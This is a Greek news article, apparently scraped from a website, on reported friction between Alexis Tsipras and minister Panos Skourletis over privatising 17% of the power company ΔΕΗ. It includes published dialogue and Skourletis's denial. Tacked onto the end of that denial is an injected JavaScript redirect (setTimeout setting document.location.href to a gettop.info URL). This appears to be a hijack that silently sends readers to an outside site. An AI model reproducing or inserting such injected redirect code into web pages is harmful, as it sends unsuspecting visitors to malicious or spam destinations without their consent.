Αμοιβαία καχυποψία Τσίπρα-Σκουρλέτη, αν και διαψεύδει ο υπουργός

0
15

Έφτασαν ένα βήμα πριν από την οριστική ρήξη οι σχέσεις του Αλέξη Τσίπρα με τον πρώην εκπρόσωπό του Πάνο Σκουρλέτη; Ελέχθησαν, στη συνάντησή τους στο Μέγαρο Μαξίμου, «χοντρές» κουβέντες;

Πράγματι, ο υπουργός Περιβάλλοντος και Ενέργειας κατηγόρησε τον πρωθυπουργό ότι διοχετεύει στα ΜΜΕ απειλές ότι θα τον διώξει από τη θέση του, επειδή διαφωνεί με την ιδιωτικοποίηση του 17% της ΔΕΗ;

Και είναι αλήθεια ότι εκείνος έκανε «ρελάνς» κατηγορώντας τον για όσα είπε στο συνέδριο και, κυρίως, για τη φράση του «το πρόγραμμα δε βγαίνει».

Η “Realnews” δημοσιεύει διαλόγους που μεταφέρουν κλίμα έντασης και αμοιβαίας καχυποψίας. Ωστόσο, ο κ. Σκουρλέτης τα διαψεύδει όλα κατηγορηματικά, κάνοντας λόγο για «κατασκευασμένα δημοσιεύματα, που στόχο έχουν να δημιουργήσουν εικόνα κρίσης στην κυβέρνηση».

Άνθρωποι που συνομιλούν και με τους δυο μεταφέρουν, πάντως, ατμόσφαιρα πρωτοφανούς ψυχρότητας και επιφυλακτικότητας. Ο υπουργός είναι βέβαιος ότι από το Μαξίμου προέρχονται οι πληροφορίες περί αποπομπής του και θεωρεί ως ισχυρή ένδειξη το γεγονός ότι δεν προτάθηκε για το νέο πολιτικό συμβούλιο. Από την άλλη, ο πρωθυπουργός τον κατηγορεί για «επίδειξη αριστεροσύνης» και, μάλιστα, για ένα θέμα που έχει συμφωνηθεί στο περσινό μνημόνιο.

Ο διάλογος όπως δημοσιεύεται:

Π. Σκουρλέτης: «Από Το Μαξίμου βγαίνουν διαρροές ότι στον ανασχηματισμό δεν θα μείνω στο Υπουργείο Ενέργειας λόγω των απόψεών μου για τις ιδιωτικοποιήσεις και επειδή δεν θέλω την ιδιωτικοποίηση του 17% της ΔΕΗ».

Αλ. Τσίπρας: «Δεν είναι αλήθεια. Ποτέ δεν έχουν διαρρεύσει αυτά από εδώ».

Π. Σκουρλέτης: «Δεν πείθομαι, το γνωρίζω».

Αλ. Τσίπρας: «Μου δημιουργούν πρόβλημα ενόψει του ανασχηματισμού με όλα αυτά. Εάν σε βγάλω  από το υπουργείο όλοι θα πουν ότι σε έβγαλα επειδή ήσουν αντίθετος στις ιδιωτικοποιήσεις και επειδή μου το ζήτησαν οι δανειστές. Εάν μείνεις όλοι θα πουν ότι κέρδισαν αυτοί που είναι κατά του προγράμματος». 

Π. Σκουρλέτης: «Σκόπιμα με στοχοποιούν διάφορα δημοσιεύματα. Αλλά από τη λίστα του Πολιτικού Συμβουλίου γιατί με έβγαλες;»

Αλ. Τσίπρας: «Υπήρχε η ποσόστωση και έπρεπε να οριστούν παραπάνω γυναίκες». 

Για το συνέδριο:

Αλ. Τσίπρας: «Ήταν πράγματα αυτά που είπες;»

Π. Σκουρλέτης: «Μα στο δια ταύτα συμφωνώ μαζί σου. Να μη διολισθήσουμε όμως σε λογικές success story. Τότε θα καταστείς αφερέγγυος».

Όσον αφορά την ιδιωτικοποίηση της ΔΕΗ ο Πάνος Σκουρλέτης έκρουσε τον κώδωνα του κινδύνου στον Αλέξη Τσίπρα.

Π. Σκουρλέτης: «Να ξέρεις ότι  η ιδιωτικοποίηση του 17% είναι “καυτή πατάτα”. Είναι ικανή να ρίξει την κυβέρνηση. Αυτή μπορεί, όχι ο Σκουρλέτης».

Η απάντηση Σκουρλέτη:

«Το σήριαλ των κατασκευασμένων δημοσιευμάτων συνεχίζεται με την ίδια  πάντα στόχευση, τη δημιουργία εικόνας κρίσης για την  κυβέρνηση. Είναι προφανές πως οι σημερινοί διάλογοι που δημοσιεύονται στην εφημερίδακαι αναφέρονται σε συνομιλία μου με τον πρωθυπουργό, δεν ανταποκρίνονται στην πραγματικότητα». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here